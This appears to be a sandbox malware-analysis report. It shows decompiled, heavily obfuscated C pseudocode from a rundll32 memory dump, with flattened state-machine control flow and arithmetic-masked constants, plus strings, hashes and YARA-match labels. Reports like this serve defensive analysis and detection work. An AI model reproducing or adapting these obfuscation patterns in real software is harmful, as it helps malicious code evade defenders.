COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00360F33() {
				signed int _t237;
				signed char _t246;
				signed short _t255;
				signed int _t262;
				signed char _t269;
				intOrPtr* _t292;
				signed short _t301;
				void* _t302;
				signed short _t306;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed short _t319;
				void* _t321;

				 *(_t321 + 0x20) = 0xee0abc;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
				_t262 = 0x40ff1a8;
				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
				 *(_t321 + 0x14) = 0x97563a;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
				_t309 = 0x68;
				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
				 *(_t321 + 0x54) = 0x46dfd;
				_t310 = 0x22;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
				 *(_t321 + 0x50) = 0x65d669;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
				 *(_t321 + 0x1c) = 0xa5dab8;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
				 *(_t321 + 0x58) = 0x508bac;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
				 *(_t321 + 0x38) = 0x6dc462;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
				 *(_t321 + 0x20) = 0x10f337;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
				_t311 = 0x7a;
				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
				 *(_t321 + 0x28) = 0x5a8e56;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
				 *(_t321 + 0x40) = 0x558325;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
				 *(_t321 + 0x3c) = 0x76576d;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
				 *(_t321 + 0x38) = 0x7fcfc;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
				 *(_t321 + 0x58) = 0x685aea;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
				 *(_t321 + 0x24) = 0x2cb25b;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
				 *(_t321 + 0x20) = 0x5c4f5f;
				_t312 = 0x75;
				_t306 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
				_t319 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
				 *(_t321 + 0x48) = 0x281dd4;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
				 *(_t321 + 0x60) = 0x5ec984;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
				 *(_t321 + 0x4c) = 0xbf15d9;
				_t313 = 0x6c;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
				_t314 = 0x6b;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
				 *(_t321 + 0x30) = 0x4468c3;
				_t315 = 0x7e;
				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
				while(1) {
					L1:
					_t292 =  *0x363e08; // 0x0
					while(1) {
						L2:
						_t237 =  *(_t321 + 0x60);
						L3:
						while(_t262 != 0x160fcc4) {
							if(_t262 == 0x26954f0) {
								 *_t237 = _t319;
								_t262 = 0xfeff895;
								 *_t292 =  *_t292 + 1;
								_t237 = _t319;
								 *(_t321 + 0x60) = _t237;
								continue;
							} else {
								if(_t262 == 0x40ff1a8) {
									_t179 = _t292 + 0x20; // 0x20
									_t237 = _t179;
									_t262 = 0x5ead19b;
									 *(_t321 + 0x60) = _t237;
									continue;
								} else {
									if(_t262 == 0x58e8483) {
										_push(_t262);
										_push(_t262);
										_t302 = 0x40;
										_t319 = E00347FF2(_t302);
										__eflags = _t319;
										if(__eflags == 0) {
											goto L20;
										} else {
											_t262 = 0x160fcc4;
											goto L1;
										}
									} else {
										if(_t262 == 0x5ead19b) {
											_t255 = E00357BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x363000);
											 *(_t321 + 0x70) = _t255;
											_t306 = _t255;
											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
											_t262 = 0x58e8483;
											while(1) {
												L1:
												_t292 =  *0x363e08; // 0x0
												goto L2;
											}
										} else {
											if(_t262 == 0xd41016e) {
												E00358519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
												L20:
												_t292 =  *0x363e08; // 0x0
											} else {
												if(_t262 != 0xfeff895) {
													L17:
													__eflags = _t262 - 0x20f61b3;
													if(__eflags != 0) {
														L2:
														_t237 =  *(_t321 + 0x60);
														continue;
													}
												} else {
													asm("sbb ecx, ecx");
													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
													continue;
												}
											}
										}
									}
								}
							}
							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
							__eflags = 1;
							return 1;
						}
						_push( *(_t321 + 0x1c));
						_push( *(_t321 + 0x38));
						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
						E00351652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E0035DCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x341590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
						E0034A8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
						_t321 = _t321 + 0x3c;
						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
						_t246 =  *((intOrPtr*)(_t306 + 6));
						_t269 =  *((intOrPtr*)(_t306 + 7));
						_t306 = _t306 + 8;
						_t262 = 0x26954f0;
						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
						__eflags = _t301;
						 *(_t319 + 0x18) = _t301;
						_t292 =  *0x363e08; // 0x0
						goto L17;
					}
				}
			}

0x00360f36
0x00360f40
0x00360f48
0x00360f56
0x00360f5a
0x00360f62
0x00360f6a
0x00360f72
0x00360f80
0x00360f85
0x00360f8b
0x00360f93
0x00360fa0
0x00360fa3
0x00360fa7
0x00360faf
0x00360fb7
0x00360fbc
0x00360fc4
0x00360fd1
0x00360fd5
0x00360fda
0x00360fdf
0x00360fe7
0x00360fef
0x00360ff7
0x00360fff
0x0036100f
0x00361013
0x0036101b
0x00361023
0x0036102b
0x00361035
0x00361036
0x0036103a
0x0036103f
0x00361047
0x0036104f
0x0036105d
0x00361061
0x00361066
0x0036106e
0x00361076
0x0036107e
0x00361086
0x0036108e
0x00361096
0x0036109a
0x003610a2
0x003610aa
0x003610b2
0x003610bc
0x003610c0
0x003610c8
0x003610d0
0x003610d8
0x003610e0
0x003610e8
0x003610f0
0x003610f8
0x003610fd
0x00361107
0x00361116
0x00361119
0x0036111d
0x00361129
0x0036112d
0x00361131
0x00361139
0x00361141
0x00361149
0x0036114e
0x00361156
0x0036115e
0x00361166
0x0036116e
0x00361176
0x00361182
0x00361187
0x00361191
0x00361196
0x0036119c
0x003611a4
0x003611b1
0x003611b2
0x003611bc
0x003611c5
0x003611c9
0x003611d1
0x003611d1
0x003611d1
0x003611d7
0x003611d7
0x003611d7
0x00000000
0x003611db
0x003611ed
0x003612a8
0x003612aa
0x003612af
0x003612b1
0x003612b3
0x00000000
0x003611f3
0x003611f9
0x00361297
0x00361297
0x0036129a
0x0036129f
0x00000000
0x003611ff
0x00361205
0x00361277
0x00361278
0x0036127b
0x00361281
0x00361285
0x00361287
0x00000000
0x0036128d
0x0036128d
0x00000000
0x0036128d
0x00361207
0x0036120d
0x0036124c
0x00361252
0x00361256
0x0036125d
0x00361261
0x003611d1
0x003611d1
0x003611d1
0x00000000
0x003611d1
0x0036120f
0x00361215
0x0036138c
0x00361392
0x00361392
0x0036121b
0x00361221
0x00361373
0x00361373
0x00361379
0x003611d7
0x003611d7
0x00000000
0x003611d7
0x00361227
0x0036122b
0x00361233
0x00000000
0x00361233
0x00361221
0x00361215
0x0036120d
0x00361205
0x003611f9
0x0036139b
0x003613a1
0x003613a7
0x003613ac
0x003613ac
0x003612c4
0x003612ca
0x003612d5
0x003612dc
0x0036131e
0x00361333
0x0036133c
0x0036134a
0x0036134e
0x00361351
0x00361354
0x00361361
0x00361366
0x00361366
0x00361369
0x0036136d
0x00000000
0x0036136d
0x003611d7

Strings

mWv, xrefs: 0036108E
_O\, xrefs: 00361107
Zh, xrefs: 003610C8
=r;, xrefs: 00361139
N, xrefs: 0036107E
4t, xrefs: 00360F72

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4t$=r;$_O\$mWv$N$Zh
API String ID: 0-2036408213
Opcode ID: 7b58b4e782c0264b8c1da31583ae8de57fa2c9c74eeaa25009807c6efa3e980d
Instruction ID: bb8d18ae7bfe7e0331feb968ff01914ffd3550401ea9013a71463ee1a40541d6
Opcode Fuzzy Hash: 7b58b4e782c0264b8c1da31583ae8de57fa2c9c74eeaa25009807c6efa3e980d
Instruction Fuzzy Hash: D8C150715083819FC319CF2AC48945BBFE1FBC9358F148A0EF6969A260D3B4D949CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0035D389 Relevance: 7.7, Strings: 6, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E0035D389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* __ecx;
				char _t245;
				void* _t263;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				void* _t280;
				void* _t306;
				intOrPtr _t307;
				char _t308;
				signed int* _t311;

				_push(_a28);
				_t306 = __edx;
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_t245 = E003520B9(0);
				_v72 = _t245;
				_t311 =  &(( &_v168)[9]);
				_v84 = 0xd8cd3;
				_t307 = _t245;
				_v84 = _v84 ^ 0x2f0b54cb;
				_v84 = _v84 ^ 0x2f06dc18;
				_t280 = 0xd3d1227;
				_v116 = 0xdf2f98;
				_v116 = _v116 >> 4;
				_v116 = _v116 | 0xd629951a;
				_v116 = _v116 ^ 0xd62df7db;
				_v120 = 0x9d2532;
				_v120 = _v120 | 0x60368432;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0xc1706bd2;
				_v104 = 0x3ed100;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 << 0x10;
				_v104 = _v104 ^ 0x01fb42fe;
				_v132 = 0xac3ff1;
				_v132 = _v132 << 1;
				_v132 = _v132 ^ 0x8b709814;
				_v132 = _v132 + 0xffff5c55;
				_v132 = _v132 ^ 0x8a223f6b;
				_v164 = 0xc1955c;
				_v164 = _v164 + 0xe851;
				_v164 = _v164 >> 5;
				_t272 = 0x7c;
				_v164 = _v164 / _t272;
				_v164 = _v164 ^ 0x000d6983;
				_v76 = 0x371de3;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x00157680;
				_v156 = 0xc7985;
				_v156 = _v156 + 0xffff997a;
				_v156 = _v156 + 0x5493;
				_v156 = _v156 ^ 0xa8ab967c;
				_v156 = _v156 ^ 0xa8a621f4;
				_v92 = 0xd6ada;
				_v92 = _v92 + 0xf102;
				_v92 = _v92 ^ 0x00049005;
				_v152 = 0xbb1df2;
				_t273 = 0x71;
				_v152 = _v152 * 0x37;
				_v152 = _v152 << 2;
				_v152 = _v152 + 0x7572;
				_v152 = _v152 ^ 0xa0c338c0;
				_v108 = 0xfb68a6;
				_v108 = _v108 / _t273;
				_v108 = _v108 * 0x38;
				_v108 = _v108 ^ 0x00745d8a;
				_v160 = 0x9cfb41;
				_v160 = _v160 >> 0xd;
				_v160 = _v160 + 0xffff2425;
				_v160 = _v160 | 0xc56bf860;
				_v160 = _v160 ^ 0xffffb927;
				_v100 = 0xcc3697;
				_v100 = _v100 << 9;
				_t274 = 0x3d;
				_v100 = _v100 / _t274;
				_v100 = _v100 ^ 0x027f162e;
				_v124 = 0x5e8102;
				_v124 = _v124 << 1;
				_v124 = _v124 >> 4;
				_v124 = _v124 ^ 0x000928e5;
				_v96 = 0x9a5083;
				_v96 = _v96 + 0xffff88fb;
				_v96 = _v96 | 0x7e2ee754;
				_v96 = _v96 ^ 0x7eb15945;
				_v168 = 0x417f4c;
				_v168 = _v168 + 0x30ef;
				_v168 = _v168 + 0xffff0fcf;
				_v168 = _v168 | 0x766f950c;
				_v168 = _v168 ^ 0x7667a907;
				_v148 = 0xeb5ea2;
				_v148 = _v148 >> 1;
				_v148 = _v148 | 0xdbfe62fd;
				_v148 = _v148 ^ 0xdbf81284;
				_v88 = 0xc982d2;
				_v88 = _v88 | 0xbf502ba4;
				_v88 = _v88 ^ 0xbfda3d08;
				_v80 = 0x51a7e7;
				_v80 = _v80 | 0xcf4b4eb1;
				_v80 = _v80 ^ 0xcf5d8599;
				_v140 = 0x112038;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 | 0x79e3f6d0;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 ^ 0x000d6368;
				_v144 = 0x3c4be1;
				_v144 = _v144 << 1;
				_t275 = 0x51;
				_v144 = _v144 / _t275;
				_t276 = 0x44;
				_v144 = _v144 / _t276;
				_v144 = _v144 ^ 0x0006a926;
				_v112 = 0xebe610;
				_t277 = 6;
				_v112 = _v112 / _t277;
				_v112 = _v112 ^ 0x8e2a0175;
				_v112 = _v112 ^ 0x8e0783c0;
				_v128 = 0x507b99;
				_v128 = _v128 ^ 0xb6dd86a4;
				_v128 = _v128 + 0xffff6e9b;
				_v128 = _v128 * 0x6f;
				_v128 = _v128 ^ 0x275b8ca8;
				_v136 = 0x1b49e9;
				_v136 = _v136 * 0x22;
				_v136 = _v136 ^ 0x6bc19a50;
				_v136 = _v136 ^ 0xda04c504;
				_v136 = _v136 ^ 0xb25c1cc6;
				do {
					while(_t280 != 0x9b6c7ef) {
						if(_t280 == 0xd3d1227) {
							_t280 = 0x9b6c7ef;
							continue;
						} else {
							if(_t280 == 0xd8aa277) {
								E00359008(_v72, _v128, _v136);
							} else {
								_t317 = _t280 - 0xdb35d55;
								if(_t280 != 0xdb35d55) {
									goto L10;
								} else {
									_push(_v164);
									_push(_v132);
									_t308 = 0x44;
									E00344B61( &_v68, _t308);
									_push(_v92);
									_v68 = _t308;
									_push(_v156);
									_t284 = _v76;
									_v60 = E0035DCF7(_v76, 0x34173c, _t317);
									_t307 = E0035DE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
									E0034A8B0(_v144, _v60, _v112);
									_t311 =  &(_t311[0x19]);
									_t280 = 0xd8aa277;
									continue;
								}
							}
						}
						L13:
						return _t307;
					}
					_t263 = E00344241(_t280, _v120,  &_v72, _a28, _v104);
					_t311 =  &(_t311[3]);
					__eflags = _t263;
					if(_t263 == 0) {
						_t280 = 0xcb447d9;
						goto L10;
					} else {
						_t280 = 0xdb35d55;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t280 - 0xcb447d9;
				} while (_t280 != 0xcb447d9);
				goto L13;
			}

0x0035d393
0x0035d39c
0x0035d39e
0x0035d3a5
0x0035d3a6
0x0035d3ad
0x0035d3b4
0x0035d3b5
0x0035d3bc
0x0035d3be
0x0035d3c3
0x0035d3ca
0x0035d3cd
0x0035d3d5
0x0035d3d7
0x0035d3e1
0x0035d3e9
0x0035d3ee
0x0035d3f6
0x0035d3fb
0x0035d403
0x0035d40b
0x0035d413
0x0035d41b
0x0035d41f
0x0035d427
0x0035d42f
0x0035d434
0x0035d439
0x0035d441
0x0035d449
0x0035d44d
0x0035d455
0x0035d45d
0x0035d465
0x0035d46d
0x0035d475
0x0035d480
0x0035d485
0x0035d48b
0x0035d493
0x0035d49b
0x0035d49f
0x0035d4a7
0x0035d4af
0x0035d4b7
0x0035d4bf
0x0035d4c7
0x0035d4cf
0x0035d4d7
0x0035d4df
0x0035d4e7
0x0035d4f4
0x0035d4f5
0x0035d4f9
0x0035d4fe
0x0035d506
0x0035d50e
0x0035d51c
0x0035d525
0x0035d529
0x0035d531
0x0035d539
0x0035d53e
0x0035d546
0x0035d54e
0x0035d558
0x0035d565
0x0035d570
0x0035d575
0x0035d57b
0x0035d583
0x0035d58b
0x0035d58f
0x0035d594
0x0035d59c
0x0035d5a4
0x0035d5ac
0x0035d5b4
0x0035d5bc
0x0035d5c4
0x0035d5cc
0x0035d5d4
0x0035d5dc
0x0035d5e4
0x0035d5ec
0x0035d5f0
0x0035d5f8
0x0035d600
0x0035d608
0x0035d610
0x0035d618
0x0035d620
0x0035d628
0x0035d630
0x0035d638
0x0035d63d
0x0035d645
0x0035d64a
0x0035d652
0x0035d65a
0x0035d662
0x0035d667
0x0035d671
0x0035d676
0x0035d67c
0x0035d684
0x0035d690
0x0035d698
0x0035d69c
0x0035d6a4
0x0035d6ac
0x0035d6b4
0x0035d6bc
0x0035d6c9
0x0035d6cd
0x0035d6d5
0x0035d6e2
0x0035d6e6
0x0035d6ee
0x0035d6f6
0x0035d6fe
0x0035d6fe
0x0035d70c
0x0035d7ec
0x00000000
0x0035d712
0x0035d718
0x0035d839
0x0035d71e
0x0035d71e
0x0035d720
0x00000000
0x0035d726
0x0035d726
0x0035d72e
0x0035d734
0x0035d737
0x0035d73c
0x0035d745
0x0035d74c
0x0035d750
0x0035d75c
0x0035d7d4
0x0035d7da
0x0035d7df
0x0035d7e2
0x00000000
0x0035d7e2
0x0035d720
0x0035d718
0x0035d840
0x0035d84b
0x0035d84b
0x0035d807
0x0035d80c
0x0035d80f
0x0035d811
0x0035d81a
0x00000000
0x0035d813
0x0035d813
0x00000000
0x0035d813
0x00000000
0x0035d81f
0x0035d81f
0x0035d81f
0x00000000

Strings

(, xrefs: 0035D594
T.~, xrefs: 0035D5AC
0, xrefs: 0035D5C4
hc, xrefs: 0035D64A
K<, xrefs: 0035D652
ru, xrefs: 0035D4FE

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: T.~$hc$ru$($0$K<
API String ID: 0-2343433060
Opcode ID: 601dc4708c819afe8378702e910c554993a478717e601b68b8b74e1271ad5d6b
Instruction ID: 3924f0930d1845833cbbcbc57e76350f6549ef1df6aa950a4059f7883efd80e8
Opcode Fuzzy Hash: 601dc4708c819afe8378702e910c554993a478717e601b68b8b74e1271ad5d6b
Instruction Fuzzy Hash: A4C132725083809FD769CF61C986A5BBBE1FBD5708F104A1DF69A96260C7B28908CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00343E3F Relevance: 7.7, Strings: 6, Instructions: 217
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00343E3F() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t213;
				signed int _t214;
				void* _t216;
				signed int _t222;
				intOrPtr _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				void* _t230;
				void* _t236;
				void* _t257;
				signed int* _t261;

				_t261 =  &_v100;
				_v8 = 0xc74bd8;
				_v4 = 0;
				_v72 = 0x3d4417;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xffff33fd;
				_v72 = _v72 ^ 0xbd434afc;
				_v32 = 0xa9ac19;
				_v32 = _v32 + 0x4aca;
				_v32 = _v32 ^ 0x00a9f6e1;
				_v40 = 0x1f6a8;
				_v12 = 0;
				_v40 = _v40 * 0x6f;
				_t257 = 0xf52a3f4;
				_v40 = _v40 ^ 0x00d19880;
				_v44 = 0x168b17;
				_v44 = _v44 + 0x13a5;
				_v44 = _v44 ^ 0x001ee95f;
				_v48 = 0xfac2ed;
				_v48 = _v48 + 0xffff2a35;
				_v48 = _v48 ^ 0x00fbd9f9;
				_v92 = 0xc00c53;
				_v92 = _v92 + 0xffff1aa9;
				_v92 = _v92 + 0xf2d7;
				_t225 = 0x68;
				_v92 = _v92 / _t225;
				_v92 = _v92 ^ 0x0000565c;
				_v68 = 0xf2ac97;
				_v68 = _v68 ^ 0x99fc0549;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000a8804;
				_v24 = 0xf89d13;
				_t226 = 0x49;
				_v24 = _v24 / _t226;
				_v24 = _v24 ^ 0x000ed122;
				_v96 = 0x9976f7;
				_v96 = _v96 >> 0xe;
				_v96 = _v96 ^ 0xdd1af6ea;
				_v96 = _v96 ^ 0x684d855d;
				_v96 = _v96 ^ 0xb5551d4c;
				_v28 = 0x12a2d6;
				_t227 = 0xe;
				_v28 = _v28 * 0x29;
				_v28 = _v28 ^ 0x02ffade5;
				_v100 = 0x1d8880;
				_v100 = _v100 + 0x8a1e;
				_v100 = _v100 * 0x7c;
				_v100 = _v100 + 0xffff421a;
				_v100 = _v100 ^ 0x0e9f1559;
				_v36 = 0x784079;
				_v36 = _v36 / _t227;
				_v36 = _v36 ^ 0x0007caf6;
				_v60 = 0xd037f8;
				_v60 = _v60 >> 0xf;
				_v60 = _v60 + 0xfffff3b4;
				_v60 = _v60 ^ 0xfff3df4e;
				_v64 = 0x95f516;
				_v64 = _v64 + 0xffffc55a;
				_v64 = _v64 | 0x523f0ae6;
				_v64 = _v64 ^ 0x52b19695;
				_v84 = 0x271827;
				_v84 = _v84 + 0xffff7017;
				_v84 = _v84 + 0x1e15;
				_v84 = _v84 ^ 0xa1c53b6b;
				_v84 = _v84 ^ 0xa1e64a9e;
				_v52 = 0x3d5883;
				_v52 = _v52 >> 5;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x000b56f4;
				_v56 = 0xd5acf2;
				_v56 = _v56 ^ 0x15c9a5cd;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0xa8e6808a;
				_v88 = 0xcc2476;
				_v88 = _v88 + 0x4ceb;
				_v88 = _v88 ^ 0xdbab884b;
				_t228 = 0x4f;
				_v88 = _v88 / _t228;
				_v88 = _v88 ^ 0x02ce2d39;
				_v20 = 0x9b21e;
				_v20 = _v20 + 0x218b;
				_v20 = _v20 ^ 0x00037084;
				_v76 = 0xcba48;
				_t229 = 0x5a;
				_t222 = _v12;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0x3acc;
				_v76 = _v76 << 0x10;
				_v76 = _v76 ^ 0xbb6cb0a9;
				_v80 = 0x9c886e;
				_v80 = _v80 ^ 0x88757b42;
				_t230 = 0x5c;
				_v80 = _v80 / _t229;
				_v80 = _v80 << 0xe;
				_v80 = _v80 ^ 0x5c6ae118;
				while(1) {
					L1:
					_t213 = 0xa360d2e;
					do {
						while(_t257 != _t213) {
							if(_t257 == 0xb87cfc3) {
								_t223 =  *0x363e10; // 0x0
								_t224 = _t223 + 0x1c;
								while(1) {
									__eflags =  *_t224 - _t230;
									if(__eflags == 0) {
										break;
									}
									_t224 = _t224 + 2;
									__eflags = _t224;
								}
								_t222 = _t224 + 2;
								_t257 = 0xc7301de;
								goto L1;
							} else {
								if(_t257 == 0xc7301de) {
									_push(_v48);
									_push(_v44);
									_t216 = E0035DCF7(_v40, 0x341080, __eflags);
									_pop(_t236);
									__eflags = E0034AAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
									E0034A8B0(_v60, _t216, _v64);
									_t261 =  &(_t261[0xf]);
									L14:
									_t213 = 0xa360d2e;
									_t230 = 0x5c;
									goto L15;
								} else {
									if(_t257 == 0xdd28c3f) {
										E00341FD1(_v20, _v76, _v80, _v16);
									} else {
										if(_t257 != 0xf52a3f4) {
											goto L15;
										} else {
											_t257 = 0xb87cfc3;
											continue;
										}
									}
								}
							}
							L18:
							return _v12;
						}
						_t214 = E00341F53(_v16, _v84, _v52, _t222, _v56, _v88);
						_t261 =  &(_t261[4]);
						__eflags = _t214;
						_t257 = 0xdd28c3f;
						_t191 = _t214 == 0;
						__eflags = _t191;
						_v12 = 0 | _t191;
						goto L14;
						L15:
						__eflags = _t257 - 0x57f878b;
					} while (__eflags != 0);
					goto L18;
				}
			}

0x00343e3f
0x00343e42
0x00343e4c
0x00343e52
0x00343e5a
0x00343e5f
0x00343e67
0x00343e6f
0x00343e77
0x00343e7f
0x00343e87
0x00343e8f
0x00343e9c
0x00343ea0
0x00343ea5
0x00343ead
0x00343eb5
0x00343ebd
0x00343ec5
0x00343ecd
0x00343ed5
0x00343edd
0x00343ee5
